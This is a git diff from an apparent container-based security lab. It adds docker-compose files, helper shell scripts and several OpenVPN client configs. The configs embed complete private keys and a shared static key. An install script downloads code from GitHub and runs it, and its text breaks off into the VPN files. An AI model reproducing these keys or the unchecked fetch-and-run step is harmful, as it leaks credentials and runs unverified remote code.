/home/domino01/data/IBM_TECHNICAL_SUPPORT/console.log + +[phpmyadmin-syslog] +port = http,https +logpath = %(syslog_authpriv)s +backend = %(syslog_backend)s + + +[zoneminder] +# Zoneminder HTTP/HTTPS web interface auth +# Logs auth failures to apache2 error log +port = http,https +logpath = %(apache_error_log)s + diff --git a/docker-compose.yml b/docker-compose.yml new file mode 100755 index 0000000..95029a4 --- /dev/null +++ b/docker-compose.yml @@ -0,0 +1,37 @@ +version: "2" + +services: + registry: + image: registry + ports: + - "5000:5000" + + master: + image: localhost:5000/sec + privileged: true + cap_add: + - NET_ADMIN + user: root + entrypoint: ["sec_bootstrap", "role=master", "sec_master_service_name=master", "sec_worker_service_name=worker"] + ports: + - "2222:22" + networks: + - net + volumes: + - /home/zoiros13/swarmlab-sec/test/project:/project + + + worker: + image: localhost:5000/sec + privileged: true + cap_add: + - NET_ADMIN + user: root + entrypoint: ["sec_bootstrap", "role=worker", "sec_master_service_name=master", "sec_worker_service_name=worker"] + networks: + - net + volumes: + - /home/zoiros13/swarmlab-sec/test/project:/project + +networks: + net: diff --git a/get_hosts b/get_hosts new file mode 100755 index 0000000..e3f6483 --- /dev/null +++ b/get_hosts @@ -0,0 +1,8 @@ +#!/bin/sh + +# Include the variables that store the Docker service names +# shellcheck disable=SC1091 +. /etc/opt/service_names + +( netstat -t | grep ESTABLISHED | awk '{print $5}' | grep "$MPI_WORKER_SERVICE_NAME" | cut -d: -f1 \ +& getent hosts "$MPI_MASTER_SERVICE_NAME" | cut -d' ' -f1 ) | sort -u diff --git a/install-vim-plugin.sh b/install-vim-plugin.sh new file mode 100755 index 0000000..4a3801c --- /dev/null +++ b/install-vim-plugin.sh @@ -0,0 +1,74 @@ +#! /usr/bin/env sh + +start_dir=$(pwd) +bin_string="export PATH=\"${PATH}:${HOME}/.vimpkg/bin\"" + +# Download the apt-vim files +curl -fSsLo ${HOME}/apt-vim/apt-vim --create-dirs \ + https://raw.githubusercontent.com/egalpin/apt-vim/master/apt-vim + +curl -fSsLo ${HOME}/apt-vim/vim_config.json \ + https://raw.githubusercontent.com/egalpin/apt-vim/master/vim_config.json + +# Add vimrc if there isn't one already +[ -f ${HOME}/.vimrc ] || touch ${HOME}/.vimrc + +# Make sure vimrc is using pathogen +if [ $(grep -c "execute pathogen#infect()" ${HOME}/.vimrc) -eq 0 ]; then + echo "execute pathogen#infect()" >> ${HOME}/.vimrc +fi +if [ $(grep -c "call pathogen#helptags()" ${HOME}/.vimrc) -eq 0 ]; then + echo "call pathogen#helptags()" >> ${HOME}/.vimrc +fi + +# Update path for executing shell +eval "$bin_string" + +added_to_profile=false +already_present=false +for rc in bashrc zshrc bash_profile; do + if [ -s "$HOME/.$rc" ]; then + if grep -q "$bin_string" "$HOME/.$rc"; then + already_present=true + else + printf "\n$bin_string\n" >> "$HOME/.$rc" + printf "== Added apt-vim PATH to '~/.$rc'\n" + added_to_profile=true + fi + fi +done + +# Execute apt-vim init +cd ${HOME}/apt-vim +python - < +-----BEGIN PRIVATE KEY----- +MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDeVYe+ZqJVT8yz +U/weebbn8MIZmfyAuN1BCwsxt1PR9Bnr+BYMRnxP2g+ZHcQhEngjBAuBIgBjLqV+ +B6qceDz3vVmHjzvNZDzx6laQDKxfjbcTX/RlFqDSAtwzgBRENjsUzcdKq42l/Upu +9wh2CPrVGfB876sYTy76xEP2LYKfmqK1FMOHQRWjjgviY954Beyo2BnUsygxq9rE +UExmDoiyT9xEiexJbD/GIuuRJMxIJbgBK6/eGJRmyUXO5uKt8vLqOktiox34NVSx +8ZC5jkUB0LIxp/E2gALU7D+M4UYfFhjDmZosLN2+LIaXwXplwrcwgBeQsRvwsnX7 +J0glL6sPAgMBAAECggEAfTXV2JicW0cxlNx7Y/5Pz5d6+EgMN8HkeLjrePgxsE+0 +OXvhjtAzOhUoK6bjyWxJVA73G6Y2aaTfdnaC0tO0IiD0xq8XkrgcynCah01b1gRN +Ug/75uIzd5I8yJQc1b1k0HaDAb5Ta2OWA6ADl9W+zTxqfzHKPUp6vqbBT2aZ5Z93 +wwK3lsvqadiR3luvHpPbE9+rbZlckgAaChonm2818ZlMk+bRw8S5HVweDqJ9GQ7V +N80vddLFpkgHWKcwVerl1F28WknArPuzGE8j2DdMKGrjOSPsD6DmTwCcfMkX86yD +ijdZ8V3nE34o3B656PRavaLEMze6lOUYdlIvwaYXIQKBgQDu0oOlVIdPu8bCIab0 +SLhGbVBpsGsxvQIPpNtjALi2ZL/7MXcV4M96exMbE1OZR7Px5bvncXmKzfF7DZ0I +ow9+p7sU8OyrjFPYqyIZO/avXDxUPjSwB9hr/YmrT+wruE9wxOiovJoU51d9jSic +0PeXkWzTa9ExviAuFg7zu+AvWwKBgQDuU2o6ytpkdDOFoh/z9oRgyh5Yrob7yYB0 +IMl+SlkO3Sx0eTvOCh/ixXZyKxQtO+bXLfstXcMqKXbXQ12ZXK9hEMgQrvxtGmt8 +YyEQEB4dpzIDwL0odwGNPgw9v5F+ozp3yJGsfED2YuDvcevO2dypBuKlEfQLg7oO +qWXclVQVXQKBgERTmjJs8qGPOZhFBH0TaRVNJRp3zNNYHgTXx6SVikM0o/B8AHQT +84g5OggfCWXrK8JjVdUrk/hwX0wzYuAbts0ns9CT9UJHTZ3JqGHL1BHrs57uhShv +ti1/RinrHciMXL4It/++pd6hKVjUT/A9oPiONLJwQFOY75//05tL/yHNAoGBAIIT +AuKtvn6fMVOZRelIPb358pAiSUf5FWPMVUzZVTwYmN/FH0/4FKkXbusm+e8qR3Zg +ATwkdZV4ZgVdHiPLA2lt2FPKvbjqd4m/LNdwhI9YpqKHunXwZedp2xKEkOtWOV4R +GPjUJDyVgQEO403VeGrEeETxxInYTl8cM50t32N9AoGAXyodFR2SU2LeH01dmkyo +8rWOBrxle6tbQwvg5/M15lNKSJSPrMj/HwF8TGm9sky7nTf8MG34XoT4HAep0SQt +r9gGOZYVaFOAQjaO5MGoTEqQsgRKQd4/qjnw34A1EtW+max9E/6Q+pRAZmMsTQcw +N64WPlO37tcqFVex8Rf3TL8= +-----END PRIVATE KEY----- + + +-----BEGIN CERTIFICATE----- +MIIDVzCCAj+gAwIBAgIQUkSzUMmqqaSl/9+zl26XQjANBgkqhkiG9w0BAQsFADAW +MRQwEgYDVQQDDAtFYXN5LVJTQSBDQTAeFw0yMTAxMjMwNDUxNTlaFw0yNDAxMDgw +NDUxNTlaMBQxEjAQBgNVBAMMCXNlY192cG5fMTCCASIwDQYJKoZIhvcNAQEBBQAD +ggEPADCCAQoCggEBAN5Vh75molVPzLNT/B55tufwwhmZ/IC43UELCzG3U9H0Gev4 +FgxGfE/aD5kdxCESeCMEC4EiAGMupX4Hqpx4PPe9WYePO81kPPHqVpAMrF+NtxNf +9GUWoNIC3DOAFEQ2OxTNx0qrjaX9Sm73CHYI+tUZ8HzvqxhPLvrEQ/Ytgp+aorUU +w4dBFaOOC+Jj3ngF7KjYGdSzKDGr2sRQTGYOiLJP3ESJ7ElsP8Yi65EkzEgluAEr +r94YlGbJRc7m4q3y8uo6S2KjHfg1VLHxkLmORQHQsjGn8TaAAtTsP4zhRh8WGMOZ +miws3b4shpfBemXCtzCAF5CxG/CydfsnSCUvqw8CAwEAAaOBojCBnzAJBgNVHRME +AjAAMB0GA1UdDgQWBBSb9gH1T/P27JBhjN0Cpuho915rizBRBgNVHSMESjBIgBQq +XIIQau9BBn3TLBYCAYgU3eSBrqEapBgwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0GC +FFFs/LbCAXkoa6MEwNisGWwg8TH+MBMGA1UdJQQMMAoGCCsGAQUFBwMCMAsGA1Ud +DwQEAwIHgDANBgkqhkiG9w0BAQsFAAOCAQEAVK++P8GkkGngnKMZElSHhTYxKXsk +VIsExPbyJ1Cv7u/bOjlpE3stlha4i5C6q2ftIVdjZwl1eWH64Z77tSduVeEakHka +raoUD7ZhnuYAQ2vv7byFFHyQ/ADvrXX/0wrUGTwBhOXwyjl0voBv67tQ4okcsc9C +c20gPRwwian/0tj3C8agFtKzQ7RpyGkSZq1D6wQmmPgGUeSqMN2elHQQ5KVtlSll +ruGkWDWaI9330GYzbxIe3rTv8FhEElR3Tno6KsY4RpvZ4BvUktdFBoo+DGIom04B +WgGDwNszLVOTg0kkv61MUTZxGkgkOK3sF1Ggq6outeVI6iTl9k91z/3/CA== +-----END CERTIFICATE----- + + +-----BEGIN CERTIFICATE----- +MIIDSzCCAjOgAwIBAgIUUWz8tsIBeShrowTA2KwZbCDxMf4wDQYJKoZIhvcNAQEL +BQAwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ0NjM5WhcNMzEw +MTIxMDQ0NjM5WjAWMRQwEgYDVQQDDAtFYXN5LVJTQSBDQTCCASIwDQYJKoZIhvcN +AQEBBQADggEPADCCAQoCggEBAMlIgHdUbLlWaB+AFKC1KeIe2u9ZOq3LsY4esghm +43CgwxtrKRw87QV46RGGQmPoeKdp2Qe8im232nl1odr3r1O6/ohknTP02Q38zGBH +NyQF4cORiMHiYdS2XG0NUkf1vN0WlmwbYJHdxhGcs0/D0DGf5yY6t+j14o6xvJjX +4h4SQAfGm1p0AbEuoahY5Or4stFkUMxnUkIpZp8nGRTy+4ZMpYjOGRcaoaHQNDTX +/nPsS3AXrp5EZfZ9HIbJ68JtmUIPY803tvubDQx3C7CeiPGc/KfW7D/0SbKxh9Nk +Er25NLm8MBNQJjSs1fRMg6FlIFvR48+s446LtdWGfHedz4kCAwEAAaOBkDCBjTAd +BgNVHQ4EFgQUKlyCEGrvQQZ90ywWAgGIFN3kga4wUQYDVR0jBEowSIAUKlyCEGrv +QQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENBghRRbPy2 +wgF5KGujBMDYrBlsIPEx/jAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIBBjANBgkq +hkiG9w0BAQsFAAOCAQEAZTUmbIInXSV12DdxLOmgmiCH9BtDvXswyEfD4xMyspDT +f3SbXBiSJgfMMMys9QrLYZ06Rg+tNxGoYX7fPjiLcH5UlB3muGMNFyrL6y1mJ1C/ ++evvYjWnm6ATT6uigW0IO6mzNie3FDSitSXvZAwv+9mskuoes2I5C7EKYrixfIyN +hRfI5JYbQgTB9FI6qrrFAinnJcynWAOjoyMabfUrUme/wiKtNCzPqmmwUYh5i7+H +tfiZQ7Qkshv4VQxkq2dmq4VAPx0cuHrjVQ8ZfHhNZcX2HNsynP2KZJKLXe1pn5pg +J0D5kG11BAA8e5LNMXl42KNuQyZCh2LClkwz4Sx2Rw== +-----END CERTIFICATE----- + +key-direction 1 + +# +# 2048 bit OpenVPN static key +# +-----BEGIN OpenVPN Static key V1----- +d4d47aea6be3bda4549f485b7c38d287 +312509957ccf26428848e3095c429eee +99196bd9edb0da94b5c9209debd8d455 +41bce3ed5f5631031775359d49e49d87 +8af81b53e7f909d1b47a1fbc03e2206b +98bf518e41a43da80a652e19e39dae39 +7fa5ab1a7aff1b141b1952c1f61296b1 +363fc7a891a21acc354253e9a6a5123f +8e36e40b486b7ba40542f77749b45bf5 +27b5899c26333e11a18e90a6857f3c36 +49abe06d3afabee6f97cbc65fcc6e74e +6db46cd53e71ef4412b7328a278e9de2 +d50adaf4c942600aba4c011fa04d1368 +87ffd6f73adc9b7a772efb570e59f798 +e8cdd96c8dbc018535c3e04170dd309d +1809e77f2f216d6fc95d706ae5400eab +-----END OpenVPN Static key V1----- + + diff --git a/project/sec_vpn_2.ovpn b/project/sec_vpn_2.ovpn new file mode 100644 index 0000000..9c1901e --- /dev/null +++ b/project/sec_vpn_2.ovpn @@ -0,0 +1,110 @@ + +client +nobind +dev tun +comp-lzo +resolv-retry infinite +keepalive 15 60 +remote-cert-tls server +remote 192.168.1.5 1194 udp +float + + +-----BEGIN PRIVATE KEY----- +MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQC3HvMHw/05jiJc +/VY3uoigTUmlkvYKDk3G18CJ/p0zOdOAsYGEUgFBn4OV2QCDkam+uwICgNS6KgjS +l8SQ3+ULaqmMki1lWIi9o7aRxp7ioJ0UNOdVJo64G/rVloDUNCt+xeHleo7R6hFD +hqP4d4KIIPRHLFhU+IJ+tLaX5lRUMn2kZ4ezP5ERqSt0LsSZxKO4IswwAeuguvUx +tJgyu0YFV/Sq1/R/QpvWeEZO0/P+WnDL8xMo9WpRxRnWrVBlxJuhT976/Emdtjml +hDCgr478xtOyML+N7pbgDpbkJ92sTkO/ILEaY34CbuBtxHCtqFyDJ5QY37d8e9SZ +5ls2dM7fAgMBAAECggEAEuzC5xmNMQaMbJnN8EJ53j8+jjsK7G0gAp3HiztiGaov +PoyZuwgSkyqeGb1sfSxvo4OGKKYR1g+EC+eda++Hp09lqF5vDJtCvn6N3rDtOLSq +pyz0f2tVspdJrAs60zN1D0v6FZI98lnDYPwoNAR92/2z4SsnEdkA+4FHoZkvO+gz +KycoLfUZH1UMLKTFMmSX3dSxYzp7kPEZP2VBlyH1KA6/JE1G/fiyOdoYixgMcnCB +hZc0gPgJjRtwoQ8JXDz74uezGqm737tY+IA1DUoW4Ojcie3VAsPoZb300VecKuai +GT5KXMHgvnSUnSlJouGTebUvcDxlMzPhiO6CoN5gUQKBgQDcp3LQ3yJFnXTMqXmW +n7veHNcXUGQmo0H496L3c3XGcQt/smjOI/R+I3QQ1fogWBWaxvTSWjAZntMCJXD6 +Tu/idtZnGF3Bxg8InpmAB9mljU0FhLkpdTCbXg+HGjkZ8NEj2/kndSGB8r49Px/6 +NUJudE9VZkdiwaADaW8RAUuftwKBgQDUdFhCXwvUVsER4uZlwlRH4JgzHnClwO8r +dF7scKunMKtIStqYkfi5jc/YS4J+s2yP8KF+04NDk/PNqqvvdaak1dMVwAp/K1Pc +LZ1CqgcnuaTDhtflS/+EO7fUqazwxGqanom2NOC2sOHsGkYD8Ehb7GyhhW8KPzie +eP85mbN6GQKBgA6jnV52L1PnCmS5qbNwjYpC55JIZxyZIDtgUpOQOXQc8+JY99MV +V5c2yvCDAcE7ltNZ98ws55wLiXxO95vjuM6Ri8/zMeU1OrIbs5tm6e2t3jpLf+1c +NQlZyDXya29pJrb2VSVlBAAXFsABfCGhfvLNDKZhzsKijfcr+45pQ5cpAoGATXEv +btoYhMkuzWdJFpS0hhLPR+rzoufmBo//ve4AFAyAkvR+JBkpcfHIbo5vveGHVByh +sYpGEc8PksuAquPW38T1kbsT2HEhu2OBLHiv7QIVlhREBFgkhr4B72n+GTFvrnbV +ue4ib1WgtKCLHwpqRd+zZVkvNav/5nwyhHuLWZkCgYBky0RyDSzpm/DSZP3BvB2m +XtMat68OP6SK0SU0QT4deOM5EkOvhnkKjViRZ8f1PimDZufRz7rfEwfhEjZxrSYj +Mb7ZXFaDnzBJsxCnjq7f032SnAYD854gcdf+VrVxYfSBazcN8p8Wb0N4p8yOaVI0 +iba/pI9zOZ1usvZsyy+pJQ== +-----END PRIVATE KEY----- + + +-----BEGIN CERTIFICATE----- +MIIDVzCCAj+gAwIBAgIQGtgb8vOBzm9VXxqyeUeSnTANBgkqhkiG9w0BAQsFADAW +MRQwEgYDVQQDDAtFYXN5LVJTQSBDQTAeFw0yMTAxMjMwNDUyMDZaFw0yNDAxMDgw +NDUyMDZaMBQxEjAQBgNVBAMMCXNlY192cG5fMjCCASIwDQYJKoZIhvcNAQEBBQAD +ggEPADCCAQoCggEBALce8wfD/TmOIlz9Vje6iKBNSaWS9goOTcbXwIn+nTM504Cx +gYRSAUGfg5XZAIORqb67AgKA1LoqCNKXxJDf5QtqqYySLWVYiL2jtpHGnuKgnRQ0 +51Umjrgb+tWWgNQ0K37F4eV6jtHqEUOGo/h3gogg9EcsWFT4gn60tpfmVFQyfaRn +h7M/kRGpK3QuxJnEo7gizDAB66C69TG0mDK7RgVX9KrX9H9Cm9Z4Rk7T8/5acMvz +Eyj1alHFGdatUGXEm6FP3vr8SZ22OaWEMKCvjvzG07Iwv43uluAOluQn3axOQ78g +sRpjfgJu4G3EcK2oXIMnlBjft3x71JnmWzZ0zt8CAwEAAaOBojCBnzAJBgNVHRME +AjAAMB0GA1UdDgQWBBSO/gU91bILWZYpApQoHgewvPHJ+jBRBgNVHSMESjBIgBQq +XIIQau9BBn3TLBYCAYgU3eSBrqEapBgwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0GC +FFFs/LbCAXkoa6MEwNisGWwg8TH+MBMGA1UdJQQMMAoGCCsGAQUFBwMCMAsGA1Ud +DwQEAwIHgDANBgkqhkiG9w0BAQsFAAOCAQEAG5b3okfbW6ay+cM175cK9lgcruh/ +P1ddn3ENVgPDU0174qfNYvtKNtWuF/I09oIQLfHHvS6THmoYo6XbTuTRBANXLixu +w0fyEcbYrhZ8S3esaH6CgZv/nhMH+QWnvpkliQ9HfR4FuDn3rX6OZvSjqouNiLJI +Q0PTsf2h9MDkcC/wV1cEwGbLk9iKM/p0S1Ri4s9qgggeueIWyIcQq3t2y7vomsat +k1fCKyliFhHkwPhnsjNMTcAc9Us0QxeULq5Bu/fQ77/oS3K6VcU7GAqv5GxP/Usc +GMKwaBnhsjZNLtVdNG8kVLRHLvPcg5TYPmEfNzzC3I8AI5c6MH2LmY8hYg== +-----END CERTIFICATE----- + + +-----BEGIN CERTIFICATE----- +MIIDSzCCAjOgAwIBAgIUUWz8tsIBeShrowTA2KwZbCDxMf4wDQYJKoZIhvcNAQEL +BQAwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ0NjM5WhcNMzEw +MTIxMDQ0NjM5WjAWMRQwEgYDVQQDDAtFYXN5LVJTQSBDQTCCASIwDQYJKoZIhvcN +AQEBBQADggEPADCCAQoCggEBAMlIgHdUbLlWaB+AFKC1KeIe2u9ZOq3LsY4esghm +43CgwxtrKRw87QV46RGGQmPoeKdp2Qe8im232nl1odr3r1O6/ohknTP02Q38zGBH +NyQF4cORiMHiYdS2XG0NUkf1vN0WlmwbYJHdxhGcs0/D0DGf5yY6t+j14o6xvJjX +4h4SQAfGm1p0AbEuoahY5Or4stFkUMxnUkIpZp8nGRTy+4ZMpYjOGRcaoaHQNDTX +/nPsS3AXrp5EZfZ9HIbJ68JtmUIPY803tvubDQx3C7CeiPGc/KfW7D/0SbKxh9Nk +Er25NLm8MBNQJjSs1fRMg6FlIFvR48+s446LtdWGfHedz4kCAwEAAaOBkDCBjTAd +BgNVHQ4EFgQUKlyCEGrvQQZ90ywWAgGIFN3kga4wUQYDVR0jBEowSIAUKlyCEGrv +QQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENBghRRbPy2 +wgF5KGujBMDYrBlsIPEx/jAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIBBjANBgkq +hkiG9w0BAQsFAAOCAQEAZTUmbIInXSV12DdxLOmgmiCH9BtDvXswyEfD4xMyspDT +f3SbXBiSJgfMMMys9QrLYZ06Rg+tNxGoYX7fPjiLcH5UlB3muGMNFyrL6y1mJ1C/ ++evvYjWnm6ATT6uigW0IO6mzNie3FDSitSXvZAwv+9mskuoes2I5C7EKYrixfIyN +hRfI5JYbQgTB9FI6qrrFAinnJcynWAOjoyMabfUrUme/wiKtNCzPqmmwUYh5i7+H +tfiZQ7Qkshv4VQxkq2dmq4VAPx0cuHrjVQ8ZfHhNZcX2HNsynP2KZJKLXe1pn5pg +J0D5kG11BAA8e5LNMXl42KNuQyZCh2LClkwz4Sx2Rw== +-----END CERTIFICATE----- + +key-direction 1 + +# +# 2048 bit OpenVPN static key +# +-----BEGIN OpenVPN Static key V1----- +d4d47aea6be3bda4549f485b7c38d287 +312509957ccf26428848e3095c429eee +99196bd9edb0da94b5c9209debd8d455 +41bce3ed5f5631031775359d49e49d87 +8af81b53e7f909d1b47a1fbc03e2206b +98bf518e41a43da80a652e19e39dae39 +7fa5ab1a7aff1b141b1952c1f61296b1 +363fc7a891a21acc354253e9a6a5123f +8e36e40b486b7ba40542f77749b45bf5 +27b5899c26333e11a18e90a6857f3c36 +49abe06d3afabee6f97cbc65fcc6e74e +6db46cd53e71ef4412b7328a278e9de2 +d50adaf4c942600aba4c011fa04d1368 +87ffd6f73adc9b7a772efb570e59f798 +e8cdd96c8dbc018535c3e04170dd309d +1809e77f2f216d6fc95d706ae5400eab +-----END OpenVPN Static key V1----- + + diff --git a/project/sec_vpn_3.ovpn b/project/sec_vpn_3.ovpn new file mode 100644 index 0000000..1686f65 --- /dev/null +++ b/project/sec_vpn_3.ovpn @@ -0,0 +1,110 @@ + +client +nobind +dev tun +comp-lzo +resolv-retry infinite +keepalive 15 60 +remote-cert-tls server +remote 192.168.1.5 1194 udp +float + + +-----BEGIN PRIVATE KEY----- +MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQCyvOI9Tz8JQoLP +bLhXTTdvxGqQMqc1HDRuOWsskMI7IIaUopR+maakYheorvcvf+f2EUwCvHGYnrwb +gGSNWIm+Clh1/zwuDsWvMTOBND3UYnIjpqbc5A5Pa++8gG+HsG9bBP2aFn8wMJKZ +rnfrxDyXiBi+40oEZgbzgmC0TvTwuUDYG+IivA754kDcHrzB+AJPLYAy89Hdr2pi +PE47LBc2v64wiq3mXwiEHqiHwulMTr21ozq2D78WaZkJkIbe8A8rnn2c+RoYBM4X +a+fPafW/KxJS1cADjR6QF8tr79zDSYfCeL9h//Or00Pl17vJrWk1r6fT9OdytM5C +S+C/dEI3AgMBAAECggEBAJNT5hgrLgZv8GsRbpFncH6MJFpfpju81+rTIWhGmhMq +qEP0DvqbpCRzRpUgQ1e/0m+dqk3HDsuCbAMvPbLUfBVNacU5cV11h7T0lUO20BA0 +ZWjFgV0qDjGhAqcaJtRtthwMbQ2J5aTPJMfQa8DGrDsrT1po9yXRA4HMwfFd88BH +UXRIHQrwnNsC5FPwxINMFRHFklQGBb+AuS0SdEQp2R3DTU30kb+146HQs2vWmu3C +5EwRDaePKwQIbm1BYMakSYvt9WB5Gd5Z/WG8F9e+lIhaIgufdsZW1H+ktjM21hRt +8Y93wE8BHiXXcJh9u1CeaqysnUTp7r4cgh5ISL7uOWECgYEA5lfLEqO+VRegnXhf +70dG6NavmwIgxbcs2951CSPT3fRQc/Llft+jjuoa4aciVKZ1xTWcXITVDCwWeaOR +wvzcEHtuMyxqfe15HAQrCpvAwn9WxOPevtdH2QPz5Lvd0iqdDQLTOHQNqmFjImNo +VCHwM5WN05cgqAI1+7gx9OU0OhMCgYEAxqWTW8shGU9Pplovs7yeJE3/vjWxxXm3 +ASu1+ckpCUirQ/C2kVSa5JJHdnHghl9NyVLeDDIKXjR7o4hEuNAQnqzkhIcymxHA +ghR/WrW5ojj0Yi6Qer9v2itTleXczpXZZUinZ57CvUSmH/SYhXFdgRfrCYP5epnI +9UDmpmuvW80CgYBgyMjSBy1FMc1R/S9KKgfYc8SLfCRrDyFxLRK+CWjPXQWlAo19 +dtiRhzpOUFyzdtILUBBoK4QdPjUfXSQ06uxInKRcKjCAwxRdOj8fkPw4fSrnRdvl +Ei3lOKz1Eh8NXMxqmCJKGTFYwtzVqTFAEJaOBiv2mQymq28lWmrbPKdqMwKBgCyl +xmsZSsUviE1xc8tIF5s9VL/hvaUO6E0BEBOmXOzTQnswvTgI9g9tuVYr3jUVcpxP +Xc0L6jymOyvUUu3fBf1ECtCmun8UDFqwVLeEpMaLWpI+uQZ9xJwapNzKH0jncUdM +fyPRESANL/F6vlUv175OK+ulmAswSXSmM7Ev/uf5AoGAMw+Nmo7AvM707XCfF2Sh +HAuPYDZ2nw+Oymx1+Uo2SIXp6WjDvZ60VN5hCKFwU4PM6VNBiypEkjgF99Ix4mBH +2NleTGuJ4BgDJWMxJUEEDgqii4EisuMidebf1toeMp2anpFSFN0NTpLxDRstXoIs +TyUSfCwVyaichIb10Pb7fjs= +-----END PRIVATE KEY----- + + +-----BEGIN CERTIFICATE----- +MIIDWDCCAkCgAwIBAgIRAOIdNBnDWhtdfZSO1oMj4YYwDQYJKoZIhvcNAQELBQAw +FjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ1MjEzWhcNMjQwMTA4 +MDQ1MjEzWjAUMRIwEAYDVQQDDAlzZWNfdnBuXzMwggEiMA0GCSqGSIb3DQEBAQUA +A4IBDwAwggEKAoIBAQCyvOI9Tz8JQoLPbLhXTTdvxGqQMqc1HDRuOWsskMI7IIaU +opR+maakYheorvcvf+f2EUwCvHGYnrwbgGSNWIm+Clh1/zwuDsWvMTOBND3UYnIj +pqbc5A5Pa++8gG+HsG9bBP2aFn8wMJKZrnfrxDyXiBi+40oEZgbzgmC0TvTwuUDY +G+IivA754kDcHrzB+AJPLYAy89Hdr2piPE47LBc2v64wiq3mXwiEHqiHwulMTr21 +ozq2D78WaZkJkIbe8A8rnn2c+RoYBM4Xa+fPafW/KxJS1cADjR6QF8tr79zDSYfC +eL9h//Or00Pl17vJrWk1r6fT9OdytM5CS+C/dEI3AgMBAAGjgaIwgZ8wCQYDVR0T +BAIwADAdBgNVHQ4EFgQUU3rhoIYQLsaMIugbI8eAgikHQwswUQYDVR0jBEowSIAU +KlyCEGrvQQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENB +ghRRbPy2wgF5KGujBMDYrBlsIPEx/jATBgNVHSUEDDAKBggrBgEFBQcDAjALBgNV +HQ8EBAMCB4AwDQYJKoZIhvcNAQELBQADggEBAI3x+wAZ7wV7mdA4uLIPP6I72FED +gueB1cCkvFOXmrj0EGEKnQAOHlOQHX4BPkE+ZSUdzXRzt4+rN01OeE6NSG+SANKW +8rO5hYceP8sgMpgJ69on8uvKq2a/4kIWvs+lCGJCZ6oDBTMkZWoaKpnONjtrRzP9 +hzHhznaKvHMsDkWf+W1IR9MYJ25JjhEsV4WUrVuLRXNTc5/RlEafHipsFNI3cJkW +pMXFwEpTyMp5pe/AGyM7Ih7u9hBUbyTnUuJUtFU4IS3Sbg8nO4srwKRJsM6GIIy6 +jMGHfTeXDtYMb9xPeLc5jEKuYKY4J0cEYLBjFEN3ysczwl2ow3esjdC6qhs= +-----END CERTIFICATE----- + + +-----BEGIN CERTIFICATE----- +MIIDSzCCAjOgAwIBAgIUUWz8tsIBeShrowTA2KwZbCDxMf4wDQYJKoZIhvcNAQEL +BQAwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ0NjM5WhcNMzEw +MTIxMDQ0NjM5WjAWMRQwEgYDVQQDDAtFYXN5LVJTQSBDQTCCASIwDQYJKoZIhvcN +AQEBBQADggEPADCCAQoCggEBAMlIgHdUbLlWaB+AFKC1KeIe2u9ZOq3LsY4esghm +43CgwxtrKRw87QV46RGGQmPoeKdp2Qe8im232nl1odr3r1O6/ohknTP02Q38zGBH +NyQF4cORiMHiYdS2XG0NUkf1vN0WlmwbYJHdxhGcs0/D0DGf5yY6t+j14o6xvJjX +4h4SQAfGm1p0AbEuoahY5Or4stFkUMxnUkIpZp8nGRTy+4ZMpYjOGRcaoaHQNDTX +/nPsS3AXrp5EZfZ9HIbJ68JtmUIPY803tvubDQx3C7CeiPGc/KfW7D/0SbKxh9Nk +Er25NLm8MBNQJjSs1fRMg6FlIFvR48+s446LtdWGfHedz4kCAwEAAaOBkDCBjTAd +BgNVHQ4EFgQUKlyCEGrvQQZ90ywWAgGIFN3kga4wUQYDVR0jBEowSIAUKlyCEGrv +QQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENBghRRbPy2 +wgF5KGujBMDYrBlsIPEx/jAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIBBjANBgkq +hkiG9w0BAQsFAAOCAQEAZTUmbIInXSV12DdxLOmgmiCH9BtDvXswyEfD4xMyspDT +f3SbXBiSJgfMMMys9QrLYZ06Rg+tNxGoYX7fPjiLcH5UlB3muGMNFyrL6y1mJ1C/ ++evvYjWnm6ATT6uigW0IO6mzNie3FDSitSXvZAwv+9mskuoes2I5C7EKYrixfIyN +hRfI5JYbQgTB9FI6qrrFAinnJcynWAOjoyMabfUrUme/wiKtNCzPqmmwUYh5i7+H +tfiZQ7Qkshv4VQxkq2dmq4VAPx0cuHrjVQ8ZfHhNZcX2HNsynP2KZJKLXe1pn5pg +J0D5kG11BAA8e5LNMXl42KNuQyZCh2LClkwz4Sx2Rw== +-----END CERTIFICATE----- + +key-direction 1 + +# +# 2048 bit OpenVPN static key +# +-----BEGIN OpenVPN Static key V1----- +d4d47aea6be3bda4549f485b7c38d287 +312509957ccf26428848e3095c429eee +99196bd9edb0da94b5c9209debd8d455 +41bce3ed5f5631031775359d49e49d87 +8af81b53e7f909d1b47a1fbc03e2206b +98bf518e41a43da80a652e19e39dae39 +7fa5ab1a7aff1b141b1952c1f61296b1 +363fc7a891a21acc354253e9a6a5123f +8e36e40b486b7ba40542f77749b45bf5 +27b5899c26333e11a18e90a6857f3c36 +49abe06d3afabee6f97cbc65fcc6e74e +6db46cd53e71ef4412b7328a278e9de2 +d50adaf4c942600aba4c011fa04d1368 +87ffd6f73adc9b7a772efb570e59f798 +e8cdd96c8dbc018535c3e04170dd309d +1809e77f2f216d6fc95d706ae5400eab +-----END OpenVPN Static key V1----- + + diff --git a/project/sec_vpn_4.ovpn b/project/sec_vpn_4.ovpn new file mode 100644 index 0000000..5dff95e --- /dev/null +++ b/project/sec_vpn_4.ovpn @@ -0,0 +1,110 @@ + +client +nobind +dev tun +comp-lzo +resolv-retry infinite +keepalive 15 60 +remote-cert-tls server +remote 